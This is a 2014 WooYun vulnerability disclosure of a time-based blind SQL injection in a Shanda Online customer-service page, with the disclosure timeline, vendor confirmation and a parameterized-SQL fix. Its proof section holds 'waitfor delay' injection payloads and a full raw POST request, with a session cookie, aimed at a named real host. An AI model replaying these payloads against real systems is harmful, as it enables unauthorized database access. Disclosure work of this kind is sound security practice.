当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077459

漏洞标题:盛大在线另一分站某SQL注入

相关厂商:盛大在线

漏洞作者: Eoh

提交时间:2014-09-26 23:32

修复时间:2014-11-10 23:34

公开时间:2014-11-10 23:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-26: 细节已通知厂商并且等待厂商处理中
2014-09-27: 厂商已经确认,细节仅向厂商公开
2014-10-07: 细节向核心白帽子及相关领域专家公开
2014-10-17: 细节向普通白帽子公开
2014-10-27: 细节向实习白帽子公开
2014-11-10: 细节向公众公开

简要描述:

详细说明:

未对用户输入正确执行危险字符清理

漏洞证明:

存在问题参数txtGameUserName
测试HTTP请求时间响应Payload:
123'; waitfor delay '0:0:3' 3秒
123'; waitfor delay '0:0:9' 9秒
123'; waitfor delay '0:0:6' 6秒
POST请求
POST /VocGameUserBlockList.aspx HTTP/1.1
Content-Length: 5986
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://voc.sdo.com
Cookie: ASP.NET_SessionId=srabsmfpweyhdp55rz2g21vs; CheckCode=RLT0X
Host: voc.sdo.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnGo=%e6%9f%a5%e8%af%a2&ddlGameList=-1&ddlMonth=1&ddlYear=2013&txtGameUserName=n7shji8y';%20waitfor%20delay%20'0:0:0'%20--%20&__EVENTVALIDATION=/wEWRwLS9pqFDgL4wYbfAwL4wbLkBALw7Mj0BALx7Mj0BALy7Mj0BALz7Mj0BAL07Mj0BAL17Mj0BAL27Mj0BALn7Mj0BALo7Mj0BALw7Ij3BALw7IT3BALw7ID3BALph9WsAQK3kvf7BALgh5mvAQLnh7WvAQLmh%2bWsAQKhzfP4BQLjh7WvAQLlh5mvAQL9h%2b2sAQK7jK3RBwK7jI3RBwLK8sPlDwKz6J6lAgLlh%2bmsAQLlh/2sAQLgh9WsAQLjh5mvAQKhzYP4BQKTmuuuBALyh7WvAQLIv6zZBgLl1PKjDQKjzfP4BQLhh5mvAQKegf24BALxgoDkBQLMv4CyDgLlh9WsAQKhzY/4BQLLv6zZBgLKv6zZBgLlh9msAQLjh9msAQKGpY/kCQLmh5mvAQLmh7WvAQLF1JHlAwKu/5iOCAKcgbW7BALlh%2b2sAQLmh7mvAQLyh7mvAQKK5vGPDwLu55DcCALGraPYAwLjh7mvAQKI4YSYAgKVn6nwCgKq//SOCALV/7yOCALhh9msAQLR66H6AQKltqWkDgKltr2iDgKYstehBAKBk/m1C/l8t%2b0ta39wtQp89jXpRANZsxu/&__VIEWSTATE=/wEPDwUJLTU3Nzk1MDI4D2QWAgIBD2QWCAIDD2QWAgIBDxYCHgRUZXh0BcYTPGRpdiBjbGFzcz0iY2xlYXIiPjwvZGl2PiAgPGRsPjxkdCBjbGFzcz0iU1RZTEUyIj7mnIDmlrDlhbPms6g8L2R0PjxkZD48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDE3MDAiPuWGoOWGm%2bi2s%2beQg%2be7j%2beQhuWcqOe6vzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDAzMDAiPumbtuS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xMDAwMDIzMDAiPuWuiOaKpOS5i%2bWJkTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xNDYiPuaCjeWwhuS8oOS4ljwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03NzciPuaYn%2bi%2bsOadgDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD03MzMiPuS7meWig%2bS8oOivtOaJi%2bacuueJiDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD05OTEwMDAzNDIiPuWkuuWuneS8oOS4luKAnOeureeBteiniemGkuKAnTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuWkp%2bWei%2ba4uOaIjzwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEiPuS8oOWlh%2bS4lueVjDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00Ij7ng63ooYDkvKDlpYc8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MzkiPuW9qeiZueWym09ubGluZTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD02MSI%2b6ay85ZC554Gv5aSW5LygPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTcwIj7ljYPlubQzPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTc4Ij7msLjmgZLkuYvloZQ8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9NzkiPuS8oOWlh%2bWkluS8oDwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00OCI%2b5paw6Iux6ZuE5bm05LujPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEwNiI%2b5Lyg5aWH5b2S5p2lPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEwMSI%2b5pif5bCY5Lyg6K%2b0PC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTg4Ij7mmJ/ovrDlj5g8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9ODkiPum%2bmeS5i%2biwtzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0yMDAwMTI1MDAiPumtlOeVjDI8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9OTMiPuS8oOWlhzM8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAwMDAwNjAwIj7lpLrlrp3kvKDkuJY8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9OTkxMDAwMjgyIj7mianmlaPmgKfnmb7kuIfkuprnkZ/njos8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAwMDAxOTAwIj7mnIDnu4jlubvmg7NYSVY8L2E%2bICA8L2RsPjwvZGQ%2bPGRpdiBjbGFzcz0iY2xlYXIiPjwvZGl2PiAgPGRsPjxkdCBjbGFzcz0iU1RZTEUyIj7kvJHpl7LmuLjmiI88L2R0PjxkZD48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD01Ij7lhpLpmanlsps8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTEiPuazoeazoeWggjwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD00NSI%2b6LaF57qn6LeR6LeRPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTEzIj7mlrDng63ooYDoi7Hosao8L2E%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTQiPueWr%2beLgui1m%2bi9puKFoTwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0xNyI%2b5Yqf5aSr5bCP5a2QPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTExNiI%2b5rOh5rOh5oiY5aOrPC9hPiAgPC9kbD48L2RkPjxkaXYgY2xhc3M9ImNsZWFyIj48L2Rpdj4gIDxkbD48ZHQgY2xhc3M9IlNUWUxFMiI%2b5bCP6K%2b05bmz5Y%2bwPC9kdD48ZGQ%2bPGEgaHJlZj0iZ2FtZWluZGV4LmFzcHg/dmFsdWF0aWQ9MTAiPui1t%2beCueS4reaWh%2be9kTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuWoseS5kOW5s%2bWPsDwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTYiPui%2buemUi%2ba4uOaIjzwvYT48YSBocmVmPSJnYW1laW5kZXguYXNweD92YWx1YXRpZD0yMDUiPuS4ieWbveadgE9OTElORTwvYT4gIDwvZGw%2bPC9kZD48ZGl2IGNsYXNzPSJjbGVhciI%2bPC9kaXY%2bICA8ZGw%2bPGR0IGNsYXNzPSJTVFlMRTIiPuaXoOe6v%2bW5s%2bWPsDwvZHQ%2bPGRkPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTMwNiI%2b6bqm5bqTPC9hPjxhIGhyZWY9ImdhbWVpbmRleC5hc3B4P3ZhbHVhdGlkPTIwMDkyNzgwIj7mnInkvaA8L2E%2bICA8L2RsPjwvZGQ%2bZAIFDxAPFgIeC18hRGF0YUJvdW5kZ2QQFQIEMjAxMwQyMDE0FQIEMjAxMwQyMDE0FCsDAmdnZGQCBw8QDxYCHwFnZBAVDAExATIBMwE0ATUBNgE3ATgBOQIxMAIxMQIxMhUMATEBMgEzATQBNQE2ATcBOAE5AjEwAjExAjEyFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgkPEA8WAh8BZ2QQFTYP6K%2b36YCJ5oup5ri45oiPFeacgOe7iOW5u%2baDszE0IE9ubGluZQbovrnplIsJ5b2p6Jm55bKbDOi2hee6p%2bi3kei3kQzkvKDlpYflvZLmnaUM5Lyg5aWH5aSW5LygDOS8oOWlh%2bS4lueVjAfkvKDlpYczD%2bS8oOS4lue%2bpOiLseS8oAzkvKDkuJbml6Dlj4wM5aS65a6d5Lyg5LiWDOWcsOWfjuS5i%2bWFiQ/nlq/ni4LotZvovabihaEM5Yqf5aSr5bCP5a2QD%2bmsvOWQueeBr%2bWkluS8oBLmtanmlrnnlLXnq57lubPlj7AM5oKN5bCG5Lyg5LiWGOaJqeaVo%2baAp%2beZvuS4h%2bS6mueRn%2beOiwnpvpnkuYvosLcYTG92ZUxpdmUh5a2m5Zut5YG25YOP56WtB%2bmtlOeVjDIG6bqm5bqTCeWGkumZqeWymwnprZTnlYzmnZEM6a2U546L5pel6K6wD%2bmtlOeJqeeLqeeMjuiAhQnms6Hms6HloIIM5rOh5rOh5oiY5aOrD%2baLvOaImOS4ieWbveW/lwzplIHpk77miJjorrAP6LW354K55Lit5paH572RB%2bWNg%2bW5tDMM54Ot5paX5Lyg6K%2b0DOeDreihgOS8oOWlhwznm5vlpKfliIbnuqIP5LiJ5Zu95p2Ab25saW5lDOaYn%2bWwmOS8oOivtAnmlrDprZTnlYwP5paw54Ot6KGA6Iux6LGqD%2baWsOiLsembhOW5tOS7ownmmJ/ovrDlj5gJ5pif6L6w5p2ABuihgOaXjw7mlrDmsLTmtZJR5LygMgzmsLjmgZLkuYvloZQM5YuH6ICF5LiW55WMBXlvdW5pBuivuOS%2brxDor7jkvq8t5ZCO5a6r6K6hBumjjuS6kRTlhqDlhpvotrPnkIPnu4/nkIZPTAnpm7bkuJbnlYwM5a6I5oqk5LmL5YmRFTYCLTEJMTAwMDAxOTAwATYCMzkCNDUDMTA2Ajc5ATECOTMDMTA4AzE4OAkxMDAwMDA2MDADNzcyAjE0AjE3AjYxATcDMTQ2CTk5MTAwMDI4MgI4OQk3OTEwMDAwMzUJMjAwMDEyNTAwAzMwNgE1Azc2Mwk5OTEwMDA0NjIJNzkxMDAwMDA5AjExAzExNgk3OTEwMDAwMzYJNzkxMDAwMDM3AjEwAjcwAzEwOQE0AjQ5AzIwNQMxMDEDNTgzAjEzAjQ4Ajg4Azc3Nwk5OTEwMDA4MDEJOTkxMDAxMDgxAjc4CTk5MTAwMTM4NgkyMDA5Mjc4MDADNTkxAzY3MQI1MAkxMDAwMDE3MDAJMTAwMDAwMzAwCTEwMDAwMjMwMBQrAzZnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dkZGT8pWHQKSISLSKINERa7vCys41tgg%3d%3d
SQLMAP

voc_sqli.jpg


修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-27 12:25

厂商回复:

谢谢报告,请各位白帽子以后提交详细的漏洞证明,再次感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2014-09-27 17:39 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)

    20....刘明

  2. 2014-11-11 22:53 | idarker ( 路人 | Rank:0 漏洞数:1 | 爱生活,╮(╯▽╰)╭)

    20 ..... 果然够。。。。